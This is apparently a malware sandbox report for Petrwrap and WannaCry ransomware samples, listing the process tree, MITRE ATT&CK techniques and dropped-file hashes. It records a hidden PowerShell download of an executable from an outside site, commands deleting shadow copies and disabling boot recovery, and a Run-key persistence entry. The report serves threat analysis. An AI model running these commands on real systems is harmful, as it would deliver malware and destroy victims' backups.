"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
2⤵
PID:3044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
2⤵
PID:1812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
2⤵
PID:652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
2⤵
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
2⤵
PID:3060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
2⤵
PID:4584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
2⤵
PID:5036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
2⤵
PID:740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
2⤵
PID:3832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6724 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1236

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4660

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2844

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Petrwrap.zip\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\50121.exe');
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Petrwrap.zip\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Petrwrap.zip\svchost.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:4616

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:1516

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:840

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 18081715288081.bat
2⤵
PID:4044

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
PID:3160

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- Views/modifies file attributes
PID:3424

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:664

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
PID:2696

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2436

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
PID:3104

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 280
4⤵
- Program crash
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 280
4⤵
- Program crash
PID:3884

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2732

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3288

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "czxlscessk897" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
2⤵
PID:928

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "czxlscessk897" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:2444

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1756

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2812

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1412

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2388

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1980

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2116

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3680

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2528

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4520

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3392

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2436 -ip 2436
1⤵
PID:3684

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2436 -ip 2436
1⤵
PID:1236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]
Filesize
1KB

MD5
1e7817dbd0fc1bf032fd8fbde62293f6

SHA1
8f0dabdaf450914405123ccbbe211504de0088e7

SHA256
c31b653b409ff31d21efa8cb94df3f7461356827f5e1daa58f6f71881daa02fd

SHA512
28dd3988f3bd02626296377041feb6169f7c3fff9f5ff7d7873bee78877b66e229908dcd28b61918a64564be7113af95c2c73ff59cd86b3d6ba1b5ee4ebba851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5e027def9b55f3d49cde9fb82beba238

SHA1
64baabd8454c210162cbc3a90d6a2daaf87d856a

SHA256
9816e980b04f1fe7efaa4b9c83ff6a0fdd485ee65a884c001b43a0cad7c39d83

SHA512
a315e1336c5ec70cbb002969e539068ba92f3ec681b6d863db95227fd1808a778fd994e2fb03f28f0e401677aa5f7c66813e315b6b99a5065384c49586f9782e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0c5042350ee7871ccbfdc856bde96f3f

SHA1
90222f176bc96ec17d1bdad2d31bc994c000900c

SHA256
b8b1cb139d4d19a85adce0152fa3c4f6adfb73a322d7253820e848c6f82afc1b

SHA512
2efdb535fa6a06c4f9702b2129f2dd07c330e37fd10b492f2236007c660c1707773c22005d1e1fa580dbf633dc1a700ada3b7b611ef9accd9555a17a244f61ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
4a4957cccc122d3016fb60f11a4b593b

SHA1
a1f39d181458837dd49a964bd601bf04b62ae6b5

SHA256
e0c8162c0f57c6493905cc82d595d10f5f06bc919506c629965ac881b2fec055

SHA512
e0524fa37ae6de092dab377f83ae5fd4903bbf752c08e8e04902007224cd6fb9bd96f55a0f480c321b312561e0a0f2898e21a1a719401fadbd438efdfe5d95f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
579B

MD5
a7d1701142cca705f833d70023ef4e1e

SHA1
1b76853132abfcddb4fefac42bf9df5d013c9815

SHA256
6c92f51e7f056e73c407228fc280cb7ca4d00ab02674d1dda4eafd7dc9f070f7

SHA512
806b7ccb375cc6116e64a9fa15229d783615d13b54cf40251561d9b664f0925915c5375ad88f5ca8d061e01367de239c29da79adf693559af53eeb7d9b1ba1a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
93261bf55b54bf91c62c3d35378da082

SHA1
77d60cf98c913bde326aa03e419ccb37cb63cd6d

SHA256
1fe4a93041e028913614bd9c91bded1c7402403b4f48cf48f32cbcc37280bbbe

SHA512
567af39691376acdf3d607cb4446e161b7d0c6a1f0af532890cd153d5eee68881835fe16bf15a09e3acfe2d89ba43d1b2b5785c208853037e47fce39b4e72894

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
553adb0ed7bb2fce3741925d2f924852

SHA1
807288bc57b8405313890571a5fb6073517a793e

SHA256
0e6dd2fbe28c2a593ade6fa79da292a16b4864a9a2831c0c09387f02ae2e1b47

SHA512
443a7bbaea6106735bda272a203c5d28feb188b2d0ce5a4088d59feb59589a30db8b895a824f0f9fda92b7f0e8200d019281fdf6bb2dd6fcd0541c96a1ead2c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
9447164e04b948a117d914a392d2fc92

SHA1
e3e5156c23b00d7b6940eff4e3a3c06235cf5ada

SHA256
678ee98617d8157785d31a14a4b288df6b7d28b34aa1174336293e449dcf74f5

SHA512
9ed0af8065b16aed540b987efbdb4cc9845f4ad7ca0ffcc1e505e0717a8c7704f4c7eafaadad6c1efd49a8607cc95130d27bd567864294789a27a5715f9594f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
afd65a322765ad847da7f5ad8c273c7f

SHA1
f2c62f8e5446260df36112e6187a66ecd178c1ad

SHA256
52a66f8d2ed89f6df7f7f21d366e2fa11bfe8eb34f31a9103da9a01f6033c096

SHA512
e596a28a57ee18456324ccc13f7849a44ed7c2fb7388dee899e3f9f0b01e28158d10beb1a922d29ccc9744e4bf66b629fa0d7228e48a829f6aeafb3d0a9f4c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
7b2fa8dddeaf24b2324278435a014c67

SHA1
05627392a3d98b50863be014c481c080cd8ab681

SHA256
48c7ceaaf3f10fb088c759260147e3c9bf0945472e8a7386ab192f50b41b97a8

SHA512
0513fe5d1476865df2c18b73e182e439c451dfbb80d05aedad7c3289da17be7aff7e1eb3791602c7d468fbde5d7efb718bf27dd64658947d3db8b8b6bedd3905

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
72c72651edc3d3752f758b1f2f17fddf

SHA1
660fcba0c731a59638f1298d2ec09074bea49fd2

SHA256
6492c096b34cc2c357fef7dbea782a1187b1ce83694ab7e84ecd904c744b5050

SHA512
b84d289975f75c9be9ee68329659582d7ccc733ac733b641e25b417cb4dfb45cadc3d8156bcf123c537e16fda653c2f4bf3c1087fae1d4a822d638bf4ece4f6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
e4961e6f7f0c804010b5d8360211dce0

SHA1
5cd4b496b86e9ecf11cdddb1fa4a68c042bc9063

SHA256
d197578b1e913307724872321c2f72c0ef3eb78373400222e3e0e7b0a820cb1f

SHA512
7c0addafca0924f5f62d7e5e6dd6ef723cec47d6eca3862271454c21588afa6a0ea0ee10dcf4980fd0bf6653856a2a6d75977c76b231d14f0b006bb21b73ef7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
d75a88c8c99a454d55f8281e2e105a8e

SHA1
f8eadb0e5658fee9f853abd8fdc433207ca8fd42

SHA256
060deceee5b0935867fccfeb1f3276943c764f21bce0c0cffa8c1d58decd6778

SHA512
d0017bcf0b88e690e87b55e3df89ebdddf94423a1a2398d52363e0bd39e72b32068d96e192acd2b19dece846e3b50cc32dd3d9c323b8f7348f423607a36fe9aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
0188eee9db4912c9c40f1ffb62ab255d

SHA1
dd4b97d115d2c16badeb29ffafcc9bc3fb175a31

SHA256
c6ae1e141bd557efb8f667eb0cf87db2d8f5c01008e8d5146e0503bdf0182863

SHA512
5027d3aecc0d26784e198a4f64b5811976936e728890b74f7d25dedfe36b44fe4c6af896add3cd9bb8e6ca2211724affd11db94504a40bf11f0512cb1abc828d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
874B

MD5
1eed2daf0a58be4135f742b2f7f06719

SHA1
565f47bf66b828f0e9053e926e0d07d6b9cb1dd3

SHA256
1373386ac3f55e51a48aec460404fdf973b154ef1476e9b1409cb8df00a5ed9f

SHA512
74a4ddc433cc04ac52ca6b9fac6e05458f925e6523a06ec820408e2e89f7f813c3452801f120ae4e0d86cdaa904d6eff98a269611e321434f2377bd27c451b84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
1d86cbf65661819c8827ecc0d9d4f8da

SHA1
bb0da835eb5f33763d00247eab9dbbcf7cc9c5e7

SHA256
7386cfca423c70689232aa5af27bf3a78f914381a0cb9386a9818a89dbd59e7c

SHA512
b2d1e30cddfcc149b4ad13689355add4c5c61f07922f096c05fd2a17d45b8b8b69bdfe091127c5bf4a3a989b17d8f81cef7ae253ba1c88f4c627f7ceacf90efc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
940c59ceaef6b9c3792b55c5e642e206

SHA1
1a07a31bbc1d7db1f9ce7a30b41c28c3be17d475

SHA256
f7077885001f643823dfba31cdf1fbf6be1db73978c2c33134363ff7258c78c3

SHA512
21e734af52c0ae74e8dc824a3a10b52a3ca4ec13dfda15f4149c8ae878e1a1fe6c30ed03cfe4ae52718621f3a8a4ec02deeb3eb72c4a24f9f46c0c41a48f669b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
d233bed879e6860be07045bba794646e

SHA1
52876c33a4e40f60c461aacc0a3121593c07198b

SHA256
2be7d3f5c2b677819f35c76f21f9e503278ec6dce402a51140f3c03f2daada4b

SHA512
427c2f080028f0a927ac00d3fd499193fe935f49070289b5dd1631e13ec50ff8e09b9e9483b85d9377c89a07d95a81acc23fe956ba8d409da19c4d5f91d4255c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
18b8061c99a0baa2e9d3b2d64be14625

SHA1
39f1cac37048e929489f55e4dbfeff2ed54ab0aa

SHA256
38635c6b56904bea536c82cdd99fdc1670dc1658ad328ce001bdd9a2c75d9c63

SHA512
7cbbaec29326bc12572bf7bfa457424b3fc4d580dec299d7b2e65ea73558746f51def8ae4bf69e96ca1e545253ec29770eb40d338a1bcc3f3f197fd0a0342645

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
62faed9edff9af66b995a86322aac17d

SHA1
5f74b20041647d394d74334aec9dc92f90c303e7

SHA256
f534e5ab5865eeb5dba78f2ab989df9f6722b28e2bc94927cfa72fbcd1646ba0

SHA512
49272fc9469b64213f3cca3abf72e3bb3d62d4bcbef3ae11774a9a9927ba7dcb06344872d615ee726ac43b221d8c9b65d7fe6a749ffb06d2a4e20d8ad2e52672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
67a622c38c1a31ec022312034fef594e

SHA1
d9fa393f65c6624437e5660c0f81fe6bd8344989

SHA256
0bf481473be919415ab70f4fe54ef0202df9fcc46ad7d1a0e99d55b1dd0350ac

SHA512
af5b00047ddeb98767e5e20e4fc1137036f99e6de81945c5f0ae2d87f94144ff33777a711117dd19d5011b47a7d259f785b9576c62956281e7fcd29a1ce5a40e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
b0496b40405b92122d3c2d246a926161

SHA1
a24c3f858d4e292899df4d9d174d529af51f9e34

SHA256
e53ef21d822dc13c08d90d3b221f5d3091676c4ecc4d93eeffa58967ef91da1a

SHA512
c5e5558e87b4626099bfbd2f661035d2c4d38c5f79d4cfd9a5204ed7a9653049e48f268cd56f920b16512ff6e5560902c60152ea8320cbff2d0f63b12a0a804a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
1870f652120827caede2dea93daf9456

SHA1
6e8c8d440bf1c300c56b9521223400e7a15964fb

SHA256
d614457b29439ae66ee0fedc468bc002514ba4539d95de582cf9f439eb9338b5

SHA512
9b474e78ce2454e5f9c42ab4003827bc5b004d4d185a813e87f0aa81838fe9a86cab6f1646da75108e48f76229af40b8ae12dcadb6c256bf7f43b7145c58b7f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
b969c7d3553bde191e667e9c81ef8dcc

SHA1
5e0f46799934bf463100fafb8190fa8ae86aea1d

SHA256
69fc78a2bdee66a945e27223ed3bc146b290a0800afc865bc6841d6be9540a30

SHA512
bc0abc7e4e41d1bf0e6dae5711af359d6cd7897b9d37d8ae568e0e5666ef8043313b96cdb76ee57b1f8e5b9e37d9ecb27759061d213b13e2896c48840441ef86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581028.TMP
Filesize
874B

MD5
7031b52d0691d0adb24e03f065a98b9e

SHA1
9bed8d6aec4d1d9015158611c3848dd432a12848

SHA256
6440c69d0ff38dc10324b3ab69c405430e79862c6d4a80325492c3c1e06b26c2

SHA512
40fed3cbca4e7fbf8ea6ac20b730b0be8de67891cf4669a3c71c31c343fbe2836eb63774d442f897cfd23832d0f9c0c586aee76347917080be847ea98b8343a1

Download Submit
